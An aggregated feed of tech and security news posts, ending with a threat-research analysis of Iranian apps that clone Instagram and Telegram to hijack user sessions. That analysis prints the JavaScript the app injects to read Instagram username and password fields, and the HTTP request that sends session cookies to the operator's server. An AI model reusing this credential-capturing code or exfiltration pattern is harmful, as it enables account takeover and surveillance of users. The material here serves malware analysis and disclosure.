Tired of ads on your Android web browser?. Or the popup/notification ads showing up on your android home screen?

Well, here in this article we have provided you with the best easy ways on How to block Ads on Android.


Here is how to easily block Ads on Android Home Screen

1. Use of Opera Web Browser

block ads on android

Yes, the use of opera web browser can easily get you rid of this. All you need is to download the browser from official Google Play Store.

Install it and you are good to go.

The reason behind this is pretty simple, the Opera browser has a free inbuilt ad-blocker feature in it which eventually blocks the unnecessary ads and hence prevents you from having a bad browsing experience.

Download Opera


2. Installing free ad-blocker Browser

block ads on android

If you hate Opera and want to opt for a different option then this is for you.

The free Adblock browser works on the same principle as Opera do and made by the same company as the notorious AdBlock desktop extension.

Download Adblock Browser 


3. Blocking Pop-up Ads in Chrome

block ads on android

If you don’t feel like following the above-mentioned ways, then you can definitely try this as it won’t need you to install anything on your device.

Blocking the Pop-up ads in Chrome is counted among the best ways to get rid of those irritating ads.

Ways to Turn it on

  • Launch the browser and tap on the three dots at the top right of the screen
  • Then choose Settings, Site Settings
  • And Scroll down to Pop-ups and make sure the slider is set to Blocked.

4. Use of Data Saver Mode

block ads on android

If you are one of those who love chrome and decided to stick with it then you can use the data saver mode.

Yes, the data saver mode somehow helps you in getting rid of those irritating ads.

Actually, it simply disables that content which is not necessary for your mobile. Which means the pop-up ads, banners etc won’t show up on the screen.

Ways to Turn on the Data Saver mode

  • Just open the Chrome
  • Hit the three dots menu icon in the top righthand corner
  • Find settings
  • Then Data Saver mode
  • And turn it On.

Also, Read – What Is Android System WebView: How To Enable And Use IT?


Conclusion

So this was all regarding on How to block Ads on Android. If you find it helpful then do let us know in the comment section below, would love to hear that.

Stay tuned for more.

The post How To Stop Ads On Android Home Screen appeared first on TechWorm.

Android System WebView: How To Enable And Use IT?

Android is perhaps the most popular smartphone OS with more than two billion active users. This highly customizable smartphone OS has dozens of hidden features and Android System WebView is one among them.

So here’s everything you need to know about the highly unnoticed feature Android System WebView.

ALSO READ: Google confirms Dark Mode on Android smartphones improves battery life


What Is Android System Webview

Android System WebView is a system component powered by Chrome that allows Android apps to display web content.

Earlier, applications like Facebook relied on external browsers for opening links on the platform. Android System WebView solves the above-mentioned issue by functioning as an in-app browser.

In simple words, Android System WebView can be considered as a miniature version of Chrome that comes pre-installed with every Android smartphone. This miniature version helps other applications to load URL without exiting the application.

Google regularly releases new updates for Android System Webview making it more secure and compatible.

Also Read- 10 best Android Apps of 2018


Do You Need Android System WebView

Android System WebView is an important application and an integral part of Android OS. That said, it can be disabled and even uninstalled if a user wants to do this.

Android System WebView is a stand-alone application that was introduced with Android Jellybean. Surprisingly, Google itself disabled Android System WebView application with Android N.

Google did this because instead of relying on Android System WebView, Chrome can be used as a webview application. Using Chrome as a webview application is more energy efficient as it eliminates the need of using two browsers thereby saving up some battery.

Consequently, if you are using Android N or above then disabling Android System WebView is a wise decision. Though using it for other Android versions is important for optimal performance.

Also Read- How To Stop Ads On Android Home Screen

So this was some basic information about an unnoticed yet nifty feature on Android OS.

Do let us know in the comments if you know anything that we should add about Android System WebView that we should add in this article.

The post Android System WebView: How To Enable And Use IT? appeared first on TechWorm.

Popular Android apps on Play Store caught defrauding users

By Waqas

A well-known Chinese app developer Cheetah Mobile and one of its subsidiaries Kika Tech might have claimed credit for millions of dollars from advertisers through an Android fraud scheme, reveals app analytics firm Kochava. It is a common practice for mobile app developers to generate revenue by marketing for new apps inside their apps for […]

This is a post from HackRead.com Read the original post: Popular Android apps on Play Store caught defrauding users

A week in security (November 19 – 25)

Last week on Malwarebytes Labs, we took a look at a devastating business email compromise attack, web skimming antics, and the fresh perils of Deepfakes. We also checked out some Chrome bug issues, and took the deepest of deep dives into DNA testing.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 19 – 25) appeared first on Malwarebytes Labs.

Security Affairs: 13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.



Security Affairs

13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).

Google Play Malicious apps

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.

13 Malware-Laden Fake Apps on Google Play

A security researcher used Twitter to warn users about about malware embedded in fake apps available on Google Play. Lukas Stefanko, malware researcher at ESET, reported the malicious apps to

The post 13 Malware-Laden Fake Apps on Google Play appeared first on The Cyber Security Place.

13 malware gaming apps on Play Store installed by half a million users

By Waqas

Android is one of the most used mobile operating systems in the world and that makes it a lucrative target for malicious hackers. Recently, ESET’s IT security researcher Lukas Stefanko identified the presence of a malware in 13 driving gaming apps on none other than Google Play Store. What’s worse is that these apps were installed by more […]

This is a post from HackRead.com Read the original post: 13 malware gaming apps on Play Store installed by half a million users

Errors to avoid when downloading apps

There are literally millions of smartphone apps in existence, allowing you to do virtually anything from the palm of your hand. In fact, the humble smartphone has become the primary computing device for many people today.

The vast majority of these apps are perfectly safe, but there are bad apps out there. Apps that steal data, track your location without permission, or secretly share sensitive information with third parties for instance.

Worse still, these apps may look and act like the real thing, so you don’t even realise there’s a problem. So how can you avoid making the mistake of downloading a bad app?

Only use official app stores

For iPhone users, there is only one place to download apps – the official Apple App Store. Every app listed is checked by Apple to ensure that it is malware-free – and in most cases this process works very well.

Android users have a lot more choice – they can download and install software from any website or app store that they choose. But this flexibility brings an increased risk of installing a compromised app.

For this reason you should only ever download and install apps from official app stores like Google Play, the Amazon Appstore or the website of your handset manufacturer like Samsung. Each of these stores carry out checks on the quality and security of the apps available, offering a good degree of protection against malware.

You should never install apps from an unrecognised website. In fact, you should only install apps from one of these official, well-known app stores.

Ensure you have mobile anti-malware installed

As previously mentioned, most bad apps are very clever – the longer you have them installed, the more of your data they can steal. They will do everything possible to deflect attention so that you don’t notice there’s anything wrong.

It is possible to have malware installed on your phone for months – or maybe even years.

The biggest mistake most Android phone owners make is to leave their handset unprotected. Anti-malware, like Panda Mobile Security, can scan your smartphone for these bad apps and advise you that there is a problem. You then have early warning about malware – and the opportunity to delete it before your data is stolen.

You should also consider choosing a mobile security tool that uses a secure VPN service to protect your web traffic. A product like Panda Dome Advanced automatically blocks traffic to compromised websites (and dodgy app stores) – which means your data can’t be stolen, and you cannot download bad apps by accident.

Be sensible

The biggest mistake most people make is to simply download and use apps without thinking. By not stopping to think about where an app came from, or to check that the app is safe before installation, people are creating serious problems for themselves.

The good news is that a comprehensive mobile security service adds a layer of additional protection for when you forget to check where an app came from.

The final mistake people make? Not taking immediate action. Click here to download free antivirus for Android now.

Download Panda Mobile Security

The post Errors to avoid when downloading apps appeared first on Panda Security Mediacenter.

500,000 Duped Into Downloading Android Malware Posing As Driving Games On Google Play

Be careful what you're downloading from Google Play. Especially if it's one of 13 apps posing as driving games created by one developer called Luiz Pinto. From a report: More than 560,000 have already been tricked into downloading the games, which include a mix of luxury car and truck simulation apps, as discovered by Android malware researcher Lukas Stefanko. Once installed on a user's Android device, the games don't actually work. Looking at the reviews on Google Play, users who downloaded them complained it was a virus. For instance, among the masses of one-star reviews for the Truck Cargo Simulator, one noted his device slowed down after it forced him to download an app that wasn't the game itself. Many simply called it a scam.

Read more of this story at Slashdot.

Police arrest alleged Russian hacker behind huge Android ad scam

Police in Bulgaria have arrested an alleged Russian hacker who may be responsible for a huge Android ad scam that netted $10 million. The individual identified as Alexander Zhukov is a Saint Petersburg native who's been living in Varna, Bulgaria, since 2010 and was apprehended on November 6th after the US issued an international warrant for his arrest, according to ZDNet.

Source: Kommersant

iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

By Carolina

Nowadays, it has become a social rule to own a smartphone, and humanity has become more dependent on social networks than ever before. We need to be connected to the Internet at all times and we publish our most private and personal thoughts there. Even in social events people spend their time constantly checking their […]

This is a post from HackRead.com Read the original post: iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

Mac Virus: Apple and Android updates 17th November 2018

Bleeping Computer: iPhone X, Galaxy S9, Xiaomi Mi6 Fall at Pwn2Own Tokyo – “iPhone X, Samsung Galaxy S9, and Xiaomi Mi6 all fell at the hands of hackers that found bugs in various components and crafted exploits that allowed complete take over of the targeted device.”


 for ESET: Google’s data charts path to avoiding malware on Android
“How much higher are the odds that your device will be exposed to malware if you download apps from outside Google Play or if you use one of Android’s older versions? Google has the numbers”


Cyberscoop: Apple’s new security chip kills access to microphone – “In a security pamphlet released after Apple’s press event on Tuesday, the company revealed that the chip will completely cut off access to the device’s microphone when the MacBook lid is shut.”


The Register: Android fans get fat November security patch bundle – if the networks or mobe makers are kind enough to let ’em have it – “And Apple fixes Watch-killing security patch of its own”


Graham Cluley for BitDefender: Yes, you should update your iPhone to iOS 12.1, but its lock screen is *still* unsafe

John E. Dunn for Sophos: Another day, another update, another iPhone lock screen bypass


Sophos: Update now! Apple releases security fixes for iOS, MacOS, Safari, others


Brian Krebs: Busting SIM Swappers and SIM Swap Myths – “KrebsOnSecurity recently had a chance to interview members of the REACT Task Force, a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that has been tracking down individuals engaged in unauthorized “SIM swaps” — a complex form of mobile phone fraud that is often used to steal large amounts of cryptocurrencies and other items of value from victims.”

David Harley

Advertisements




Mac Virus

Gmail “From field” bug makes phishing attacks easier for hackers

By Waqas

Gmail, as we know, is a popular and commonly preferred email platform around the world. That’s why any news about a bug in this platform is bound to create chaos among users. And, that’s exactly the case this time. Software developer Tim Cotten has discovered a bug Gmail’s ‘From:’ header structure that can allow the […]

This is a post from HackRead.com Read the original post: Gmail “From field” bug makes phishing attacks easier for hackers

Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control

smartphone screen timeYou aren’t going to like this post. However, you will, hopefully, find yourself nodding and perhaps, even making some changes because of it. Here it friends: That love-hate relationship you have with your smartphone may need some serious attention — not tomorrow or next week — but now.

I’m lecturing myself first by the way. Thanks to the June iOS update that tracks and breaks down phone usage, I’m ready — eager in fact — to make some concrete changes to my digital habits. Why? Because the relationship with my phone – which by the way has become more like a third child — is costing me in time (75 days a year to be exact), stress, and personal goals.

I say this with much conviction because the numbers don’t lie. It’s official: I’m spending more time on my phone than I am with my kids. Likewise, the attention I give and the stress caused by my phone is equivalent to parenting another human. Sad, but true. Here’s the breakdown.

Screen time stats for the past seven days:

  • 5 hours per day on my device
  • 19 hours on social networks
  • 2 hours on productivity
  • 1 hour on creativity
  • 18 phone pickups a day; 2 pickups per hour

Do the math:

  • 35 hours a week on my device
  • 1,820 hours a year on my device
  • 75 days a year on my device

Those numbers are both accurate and disturbing. I’m not proud. Something’s gotta give and, as Michael Jackson once said, change needs to start with the man (woman) in the mirror.

A 2015 study by Pew Research Center found that 24% of Americans can’t stop checking their feeds constantly. No surprise, a handful of other studies confirm excessive phone use is linked to anxiety, depression, and a social phenomenon called FOMO, or Fear Of Missing Out.

Efficiency vs. Anxiety

There’s no argument around the benefits of technology. As parents, we can keep track of our kids’ whereabouts, filter their content, live in smart houses that are efficient and secure, and advance our skills and knowledge at lightning speeds.

That’s a lot of conveniences wrapped in even more pings, alerts, and notifications that can cause anxiety, sleeplessness, and stress.  In our hyper-connected culture, it’s not surprising to see this behavior in yourself or the people in your social circles.

  • Nervousness or anxiety when you are not able to check your notifications.
  • An overwhelming need to share things — photos, personal thoughts, stresses — with others on social media.
  • Withdrawal symptoms when you are not able to access social media.
  • Interrupting conversations to check social media accounts.
  • Lying (downplaying) to others about how much time you spend on social media sites.

We often promote balance in technology use, but this post will go one step further. This post will get uncomfortably specific in suggesting things to do to put a dent in your screentime. (Again, these suggested changes are aimed at this mom first.)

Get Intentional

  • Look at your stats. A lot of people don’t go to the doctor or dentist because they claim “not knowing” about an ailment is less stressful than smartphone screen timeknowing. Don’t take that approach to your screen time. Make today the day you take a hard look at reality. Both iOS and Android now have screen time tracking.
  • Get reinforcements.  There are a lot of apps out there like Your Hour, AppBlock, Stay Focused, Flipd, and App Off Timer designed to help curb your smartphone usage. Check out the one/s that fits your needs and best helps you control your screen time.
  • Plan your week. If you have activities planned ahead of time for the week — like a hike, reading, a movie, or spending time with friends — you are less likely to fritter away hours on your phone.
  • Leave your phone at home. Just a decade ago we spent full days away from home running errands, visiting friends, and exploring the outdoors — all without our phones. The world kept turning. Nothing fell to pieces. So start small. Go to the grocery store without your phone. Next, have dinner with friends. Then, go on a full day excursion. Wean yourself off your device and reclaim your days and strengthen your relationships.
  • Establish/enforce free family zones. Modeling control in your phone use helps your kids to do the same. Establish phone free zones such as homework time, the dinner table, family activities, and bedtime. The key here is that once you establish the phone free zones, be sure to enforce them. A lot of parents (me included) get lax after a while in this area. Research products that allow you to set rules and time limits for apps and websites. McAfee Safe Family helps you establish limits with pre-defined age-based rules that you can be customized based on your family’s needs.
  • Delete unused apps. Give this a try: Delete one social app at a time, for just a day or a week, to see if you need it. If you end up keeping even one time-wasting app off your phone, the change will be well worth it.
  • Engage with people over your phone. If you are in the line at the grocery store, waiting for a show to begin, or hanging out at your child’s school/ sports events, seek to connect with people rather than pull out your phone. Do this intentionally for a week, and it may become a habit!
  • Do one thing at a time. A lot of wasted device time happens because we are multi-tasking — and that time adds up. So if you are watching a movie, reading, or even doing housework put your phone in another room — in a drawer. Try training yourself to focus on doing one thing at a time.smartphone screen time
  • Give yourself a phone curfew. We’ve talked about phone curfews for kids to help them get enough sleep but how about one for parents? Pick a time that works for you and stick to it. (I’m choosing to put my phone away at 8 p.m. every night.)
  • Use voice recorder, notes app, or text. Spending too much time uploading random content? Curb your urge to check or post on social media by using your voice recorder app to speak your thoughts into. Likewise, pin that article or post that photo to your notes to catalog it in a meaningful way or text/share it with a small group of people. These few changes could result in big hours saved on social sites.
  • Turn off notifications. You can’t help but look at those notifications so change your habitual response by turning off all notifications.
  • Limit, don’t quit. Moderation is key to making changes stick. Try limiting your social media time to 10 minutes a day. Choose a time that works and set a timer if you need to. There’s no need to sever all ties with social media just keep it in its proper place.

Slow but Specific Changes

Lastly, go at change slowly (but specifically) and give yourself some grace. Change isn’t easy. You didn’t rack up those screen time stats overnight. You’ve come to rely on your phone for a lot of tasks as well as entertainment. So, there’s no need to approach this as a life overhaul, a digital detox, or take an everything or nothing approach. Nor is there a need to trumpet your social departure to your online communities. Just take a look at your reality and do what you need to do to take back your time and control that unruly third child once and for all. You’ve got this!

The post Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control appeared first on McAfee Blogs.

Mid-Range Google ‘Pixel 3 Lite’ Leaks With Snapdragon 670, Headphone Jack

The first alleged images of the rumored "budget" Pixel 3 have been leaked. The Pixel 3 Lite, as it is being called, looks very similar to the Pixel 3, although it features a plastic build construction, slower processor, and a headphone jack. 9to5Google reports: Just like the standard Pixel 3, there's a display that's roughly 5.56-inches in size, but this time it's an IPS LCD panel at 2220x1080 rather than an OLED panel. Obviously, there's also no notch to be seen on this alleged Pixel 3 Lite. There's a single front-facing camera as well as one speaker above that display, relatively thick bezels on the top and bottom, and a speaker along the bottom of the device as well. Perhaps most interesting when it comes to the hardware, though, is that there's a headphone jack on the top of the phone. That's certainly unexpected since the Pixel 2 dropped the jack and Google hasn't looked back since. Tests from Rozetked reveal some of the specifications running this device as well. That includes a Snapdragon 670 chipset, 4GB of RAM, and 32GB of storage. Previous reports have pointed to a Snapdragon 710. Battery capacity on this device is also reported at 2915 mAh and there's a USB-C port along the bottom. It is rumored to include the same 12MP and 8MP cameras found in the standard Pixel 3 and Pixel 3 XL, which will be a huge selling point for the affordable phone market. The price is expected to be around $400-500.

Read more of this story at Slashdot.

Mark Zuckerberg Reportedly Ordered All Facebook Executives To Use Android Phones After Tim Cook Criticized Facebook

A new report from the New York Times sheds some light on what happened inside Facebook last year as the company was fighting numerous scandals, including Russian interference and the Cambridge Analytica scandal in March. In addition to reportedly hiring a public relations firm to write dozens of articles critical of rivals Google and Apple, the social media company ordered Facebook executives to use Android phones, after Apple CEO Tim Cook criticized the company in an MSNBC interview for being a service that traffics "in your personal life." According to the report, the order came from Facebook CEO Mark Zuckerberg. The Verge reports: In those comments made back in March, Cook dismissed a question asking him what he would do if he were in Zuckerberg's shoes dealing with the fallout from the Cambridge Analytica scandal by saying, "I wouldn't be in this situation." Zuckerberg soon after retorted in an interview with Recode that he found Cook's comments to be "extremely glib," and that "I think it's important that we don't all get Stockholm syndrome and let the companies that work hard to charge you more convince you that they actually care more about you. Because that sounds ridiculous to me." While it's not clear how Cook's aggressive comments directly provoked Zuckerberg into issuing his Android-only order, it's still a rational decision to make Americans use Android. Android is the dominant operating system in many regions outside of the U.S., including South America, Europe, Russia, South Asia, and parts of the Middle East.

Read more of this story at Slashdot.

Android Ecosystem Security Transparency Report is a wary first step

Reading through Google’s first quarterly Android Ecosystem Security Transparency Report feels like a mix of missed opportunities and déjà vu all over again.

Much of what is in the new Android ecosystem security report is data that has been part of Google’s annual Android Security Year in Review report, including the rates of potentially harmful applications (PHAs) on devices with and without sideloaded apps — spoiler alert: sideloading is much riskier — and rates of PHAs by geographical region. Surprisingly, the rates in Russia are lower than in the U.S.

The only other data in the Android ecosystem security report shows the percentage of devices with at least one PHA installed based on Android version. This is new data shows that the newer the version of Android, the less likely it is a device will have a PHA installed.

However, this also hints at the data Google didn’t include in the report, like how well specific hardware partners have done in updating devices to those newer versions of Android. Considering that Android 7.x Nougat is the most common version of the OS in the wild at 28.2% and the latest version 9.0 Pie hasn’t even cracked the 0.1% marker to be included in Google’s platform numbers, the smart money says OEM updating stats wouldn’t be too impressive.

There’s also the matter of Android security updates and the data around which hardware partners are best at pushing them out. Dave Kleidermacher, head of Android security and privacy, said at the Google I/O developer conference in May 2018 that the company was tracking which partners were best at pushing security updates and that it was considering adding hardware support details to future Android Ecosystem Security Transparency Reports. More recently, Google added stipulations to its OEM contracts mandating at least four security updates per year on Android devices.

It’s unclear why Google ultimately didn’t include this data in the report on Android ecosystem security, but Google has been hesitant to call out hardware partners for slow updates in the past. In addition to new requirements in Android partner contracts regarding security updates, there have been rules stating hardware partners need to update any device to the latest version of Android released in the first 18 months after a device launch. However, it has always been unclear what the punishment would be for breaking those rules. Presumably, it would be a ban on access to Google Play services, the Play Store and Google Apps, but there have never been reports of those penalties being enforced.

Google has taken steps to make Android updates easier, including Project Treble in Android 8.0 Oreo, which effectively decoupled the Android system from any software differentiation added by a hardware partner. But, since Android 7.x is still the most common version in the wild, it doesn’t appear as though that work has yielded much fruit yet.

Adding OS and security update stats to the Android Ecosystem Security Transparency Report could go a long way towards shaming OEMs into being better and giving consumers more information with which to make purchasing decisions, but time will tell if Google ever goes so far as to name OEMs specifically.

The post Android Ecosystem Security Transparency Report is a wary first step appeared first on Security Bytes.

Cloudflare Launches Android and iOS version of 1.1.1.1 DNS Service

By Waqas

Download the app and toggle on it to generate a VPN profile that will automatically reroute the DNS traffic using the 1.1.1.1 DNS servers. On April 1, 2018, Cloudflare and APNIC launched the 1.1.1.1 public DNS service to speed up the searching process for web addresses faster and more secure. It is basically a DNS […]

This is a post from HackRead.com Read the original post: Cloudflare Launches Android and iOS version of 1.1.1.1 DNS Service

New Android API Lets Developers Push Updates Within their Apps

You might have read somewhere online today that Google is granting Android app developers powers to forcefully install app updates…but it is not true. Instead, the tech giant is providing a new feature that will help users to have up-to-date Android apps all the time and yes, it's optional. Along with the launch of a number of new tools and features at its Android Dev Summit 2018, Google has

Persian Stalker pillages Iranian users of Instagram and Telegram

This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres, Vitor Ventura and with the contributions of Eric Kuhla.

Introduction

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.

Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.
Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills its functions that are expected by the user (ex. send messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.

Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the original of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and is easily detectable, so the new routes won't be in place for very long.

Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and their nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.

A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. This same rule applies to the cloned applications, installing applications from untrusted sources implies a certain degree of risk that the users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.

Tactics

Functionality enhancement applications (grey)

Andromedaa.ir and Cambridge Universal Academy

Description of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.

While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.

Whois information for andromedaa.ir

The andromedaa.ir domain is registered with the h0mayun@outlook.com email address. This is the same email address used to registered other domains for the cloned Instagram and Telegram applications (see other sections below).

Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.

A partial list of the domains found

We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.

Certificate information

This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based off the low prevalence of those values in the SSL certificate, Talos associates this domain to the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.

List of domains associated with the same IP address

Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.


Certificate information

Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.



Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.

Price list (original HTML errors where kept, translation by google.com)

While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing highlights the benefits of using this service rather than others.

Lik3.org marketing (translation by google.com)

It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.

Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.

The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.

Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.

Application examples

Follower Begir Instagram iOS application

The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.

First screen after logging in

The developer added some features such as virtual currency and Persian language support, among others.

Certificate information

The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.

document.addEventListener('click', function() { 
    try { 
        var tu = document.querySelector('[name="username"]'); 
        var tp = document.querySelector('[name="password"]'); 
        var tpV = (typeof tp == 'undefined') ? '' : tp.value; 
        var tuV = (typeof tu == 'undefined') ? '' : tu.value; 
    } catch (err) { 
        var tuV = ''; 
        var tpV = ''    } 
    var bd = document.getElementsByTagName('body')[0].innerText; 
    var messageToPost = { 
        'pu': tuV, 
        'pp': tpV, 
        'bd': bd 
    }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);


The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.

During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1 
Host: v1.flbgr.com 
SESSIONID: [redacted] 
HEADER: vf1IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Connection: close 
Accept: */* 
Accept-Language: fr-fr 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Encoding: gzip, deflate 
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.

The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.

The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:

POST /start/fl.php?apk=35&m=ios HTTP/1.1 
Host: ndrm.ir 
HEADER: vf1 
Connection: close 
